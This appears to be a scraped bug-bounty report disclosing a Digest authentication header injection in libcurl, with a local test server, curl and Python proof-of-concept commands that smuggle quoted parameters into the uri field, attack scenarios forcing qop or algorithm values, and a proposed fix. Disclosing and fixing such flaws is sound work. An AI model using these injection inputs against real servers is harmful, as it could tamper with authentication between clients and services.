{“lastseen”:”2026-01-14T10:28:08″,”description”:”## Summary\\nThe Digest authentication implementation in `libcurl` fails to properly escape the `uri` parameter in the `Authorization` header. While other parameters like `username`, `realm`, and `nonce` are correctly escaped using `auth_digest_string_quoted()`, the `uri` is inserted raw into the header. This allows an attacker who can control the request URI to inject additional parameters into the HTTP `Authorization` header, potentially bypassing security controls or causing protocol confusion.\\n\\n## Affected Component\\n- **File:** `lib\/vauth\/digest.c`\\n- **Function:** `auth_create_digest_http_message`\\n- **Lines:** 867-897\\n\\n## Vulnerability Details\\n\\n### Root Cause\\nIn `lib\/vauth\/digest.c`, the Digest authentication response is constructed using `curl_maprintf`. The function properly escapes most parameters but fails to escape the `uri` parameter:\\n\\n“`c\\n\/* lib\/vauth\/digest.c:867-882 *\/\\nif(digest-\\u003eqop) {\\n response = curl_maprintf(\\”username=\\\\\\”%s\\\\\\”, \\”\\n \\”realm=\\\\\\”%s\\\\\\”, \\”\\n \\”nonce=\\\\\\”%s\\\\\\”, \\”\\n \\”uri=\\\\\\”%s\\\\\\”, \\” \/\/ \\u003c- VULNERABLE: uri not escaped\\n \\”cnonce=\\\\\\”%s\\\\\\”, \\”\\n \\”nc=%08x, \\”\\n \\”qop=%s, \\”\\n \\”response=\\\\\\”%s\\\\\\”\\”,\\n userp_quoted, \/\/ \\u003c- username IS escaped\\n realm_quoted, \/\/ \\u003c- realm IS escaped\\n nonce_quoted, \/\/ \\u003c- nonce IS escaped\\n uripath, \/\/ \\u003c- uri NOT escaped\\n digest-\\u003ecnonce,\\n digest-\\u003enc,\\n digest-\\u003eqop,\\n request_digest);\\n}\\n“`\\n\\nCompare this to how `username` is handled:\\n\\n“`c\\n\/* lib\/vauth\/digest.c:835-843 *\/\\nuserp_quoted = auth_digest_string_quoted(userp);\\nif(!userp_quoted)\\n return CURLE_OUT_OF_MEMORY;\\n“`\\n\\nThe `auth_digest_string_quoted()` function (lines 151-180) properly escapes double quotes and backslashes:\\n\\n“`c\\nstatic char *auth_digest_string_quoted(const char *source)\\n{\\n char *dest;\\n const char *s = source;\\n size_t n = 1; \/* null-terminator *\/\\n \\n \/* Calculate size needed *\/\\n while(*s) {\\n ++n;\\n if(*s == ‘\\”‘ || *s == ‘\\\\\\\\’) {\\n ++n; \/\/ Need extra byte for escape character\\n }\\n ++s;\\n }\\n \\n dest = curlx_malloc(n);\\n if(dest) {\\n char *d = dest;\\n s = source;\\n while(*s) {\\n if(*s == ‘\\”‘ || *s == ‘\\\\\\\\’) {\\n *d++ = ‘\\\\\\\\’; \/\/ Add escape character\\n }\\n *d++ = *s++;\\n }\\n *d = ‘\\\\0’;\\n }\\n \\n return dest;\\n}\\n“`\\n\\n### Attack Mechanism\\nIf an attacker can control the URI path to include a double quote character, they can:\\n1. Terminate the `uri` field early\\n2. Inject arbitrary parameters into the Digest header\\n3. Potentially override security-critical parameters like `qop` or `algorithm`\\n\\n## Proof of Concept\\n\\n### Prerequisites\\n- curl with Digest authentication support\\n- Python 3.x for the test server\\n\\n### Step 1: Create the Test Server\\n\\nSave this as `digest_server.py`:\\n\\n“`python\\n\\nimport socket\\nimport threading\\nimport time\\n\\ndef start_server(port=8081):\\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n s.bind((‘127.0.0.1’, port))\\n s.listen(1)\\n print(f\\”[*] Digest test server listening on port {port}\\”)\\n \\n while True:\\n try:\\n conn, addr = s.accept()\\n data = conn.recv(4096).decode(‘utf-8′, errors=’replace’)\\n \\n if \\”Authorization: Digest\\” not in data:\\n # Send 401 challenge\\n response = (\\n \\”HTTP\/1.1 401 Unauthorized\\\\r\\\\n\\”\\n \\”WWW-Authenticate: Digest realm=\\\\\\”test\\\\\\”, \\”\\n \\”nonce=\\\\\\”dcd98b7102dd2f0e8b11d0f600bfb0c093\\\\\\”, \\”\\n \\”qop=\\\\\\”auth\\\\\\”\\\\r\\\\n\\”\\n \\”Content-Length: 0\\\\r\\\\n\\”\\n \\”\\\\r\\\\n\\”\\n )\\n conn.sendall(response.encode())\\n print(\\”[*] Sent 401 challenge\\”)\\n else:\\n # Extract and display Authorization header\\n print(\\”\\\\n=== RECEIVED REQUEST ===\\”)\\n for line in data.split(‘\\\\r\\\\n’):\\n if line.startswith(‘Authorization:’):\\n print(f\\”\\\\n{line}\\\\n\\”)\\n \\n # Highlight the injection\\n if ‘injected=’ in line:\\n print(\\”[!] INJECTION DETECTED!\\”)\\n print(\\”[!] The ‘injected’ parameter should NOT be in the header\\”)\\n \\n # Send 200 OK\\n response = \\”HTTP\/1.1 200 OK\\\\r\\\\nContent-Length: 2\\\\r\\\\n\\\\r\\\\nOK\\”\\n conn.sendall(response.encode())\\n \\n conn.close()\\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n\\nif __name__ == \\”__main__\\”:\\n start_server()\\n“`\\n\\n### Step 2: Start the Server\\n\\n“`bash\\npython digest_server.py\\n“`\\n\\n### Step 3: Execute the Attack\\n\\nIn another terminal, run curl with a malicious path containing a double quote:\\n\\n“`bash\\ncurl -v –path-as-is –digest ‘http:\/\/user:pass@127.0.0.1:8081\/index.html\\”,injected=\\”true’\\n“`\\n\\n**Important:** The `–path-as-is` flag is required to prevent curl from normalizing the path.\\n\\n### Step 4: Observe the Result\\n\\nThe server will display output similar to:\\n\\n“`\\n[*] Sent 401 challenge\\n\\n=== RECEIVED REQUEST ===\\n\\nAuthorization: Digest username=\\”user\\”,realm=\\”test\\”,nonce=\\”dcd98b7102dd2f0e8b11d0f600bfb0c093\\”,uri=\\”\/index.html\\”,injected=\\”true\\”,cnonce=\\”NjE3ZjJkMzQwYzQyMQ==\\”,nc=00000001,response=\\”6629fae49393a05397450978507c4ef1\\”,qop=\\”auth\\”\\n\\n[!] INJECTION DETECTED!\\n[!] The ‘injected’ parameter should NOT be in the header\\n“`\\n\\n### Analysis of the Injected Header\\n\\nThe malicious path `\/index.html\\”,injected=\\”true` causes the following header structure:\\n\\n“`\\nuri=\\”\/index.html\\”,injected=\\”true\\”\\n“`\\n\\nInstead of the expected:\\n\\n“`\\nuri=\\”\/index.html\\\\\\”,injected=\\\\\\”true\\”\\n“`\\n\\nThis demonstrates that:\\n1. The double quote in the path terminates the `uri` field\\n2. The attacker-controlled string `injected=\\”true\\”` is inserted as a new parameter\\n3. The Digest authentication header is now malformed with an injected parameter\\n\\n### Alternative PoC (Python Script)\\n\\n“`python\\nimport subprocess\\n\\n# Malicious URL with quote injection\\nurl = ‘http:\/\/user:pass@127.0.0.1:8081\/index.html\\”,injected=\\”true’\\n\\n# Execute curl\\ncmd = [‘curl’, ‘-v’, ‘–path-as-is’, ‘–digest’, url]\\nresult = subprocess.run(cmd, capture_output=True, text=True)\\n\\nprint(\\”=== STDERR (includes headers) ===\\”)\\nprint(result.stderr)\\n\\n# Look for the injection\\nif ‘injected=\\”true\\”‘ in result.stderr:\\n print(\\”\\\\n[!] VULNERABILITY CONFIRMED\\”)\\n print(\\”[!] The injected parameter appears in the Authorization header\\”)\\nelse:\\n print(\\”\\\\n[*] Injection not detected in output\\”)\\n“`\\n\\n## Impact\\n\\n## Impact\\n\\n### Security Implications\\n\\n1. **Authentication Parameter Manipulation**\\n – Attacker can inject `qop=\\”none\\”` to downgrade authentication\\n – Inject `algorithm=\\”MD5\\”` to force weaker algorithms\\n – Add custom parameters that might confuse proxies or servers\\n\\n2. **Protocol Confusion**\\n – Malformed headers may cause different parsing by intermediaries\\n – Could lead to request smuggling in certain proxy configurations\\n\\n3. **Cache Poisoning**\\n – Injected parameters might affect cache keys\\n – Could lead to serving wrong content to users\\n\\n4. **Logging and Monitoring Bypass**\\n – Security tools parsing the header may be confused\\n – Injected parameters might not be logged correctly\\n\\n### Attack Scenarios\\n\\n**Scenario 1: QoP Downgrade**\\n“`bash\\ncurl –digest ‘http:\/\/user:pass@target.com\/path\\”,qop=\\”none’\\n“`\\nResult: `uri=\\”\/path\\”,qop=\\”none\\”,cnonce=…` – potentially downgrades authentication\\n\\n**Scenario 2: Algorithm Manipulation**\\n“`bash\\ncurl –digest ‘http:\/\/user:pass@target.com\/path\\”,algorithm=\\”MD5’\\n“`\\nResult: Forces MD5 algorithm even if server supports stronger options\\n\\n## Recommendation\\n\\n### Fix\\nUpdate `lib\/vauth\/digest.c` to escape the `uri` parameter using `auth_digest_string_quoted()`:\\n\\n“`c\\n\/* lib\/vauth\/digest.c – FIXED VERSION *\/\\n\\n\/\/ Add this before constructing the response\\nchar *uri_quoted = auth_digest_string_quoted(uripath);\\nif(!uri_quoted) {\\n curlx_free(nonce_quoted);\\n curlx_free(realm_quoted);\\n curlx_free(userp_quoted);\\n return CURLE_OUT_OF_MEMORY;\\n}\\n\\nif(digest-\\u003eqop) {\\n response = curl_maprintf(\\”username=\\\\\\”%s\\\\\\”, \\”\\n \\”realm=\\\\\\”%s\\\\\\”, \\”\\n \\”nonce=\\\\\\”%s\\\\\\”, \\”\\n \\”uri=\\\\\\”%s\\\\\\”, \\” \/\/ Now using escaped version\\n \\”cnonce=\\\\\\”%s\\\\\\”, \\”\\n \\”nc=%08x, \\”\\n \\”qop=%s, \\”\\n \\”response=\\\\\\”%s\\\\\\”\\”,\\n userp_quoted,\\n realm_quoted,\\n nonce_quoted,\\n uri_quoted, \/\/ \\u003c- FIXED: using escaped uri\\n digest-\\u003ecnonce,\\n digest-\\u003enc,\\n digest-\\u003eqop,\\n request_digest);\\n}\\n\\n\/\/ Don’t forget to free\\ncurlx_free(uri_quoted);\\n“`\\n\\n### Verification\\nAfter applying the fix, the PoC should result in a properly escaped header:\\n\\n“`\\nuri=\\”\/index.html\\\\\\”,injected=\\\\\\”true\\”\\n“`\\n\\nThe double quotes will be escaped and the injection will fail.”,”published”:”2026-01-13T13:30:37″,”modified”:”2026-01-14T10:02:17″,”type”:”hackerone”,”title”:”curl: Digest Authentication Header Injection”,”source”:””,”references”:””,”id”:”H1:3508799″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3508799″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-14T10:28:08″,”description”:”## Summary\\nThe Digest authentication implementation in `libcurl` fails to properly escape the `uri` parameter in the `Authorization` header. While other parameters like `username`, `realm`, and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-35640","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n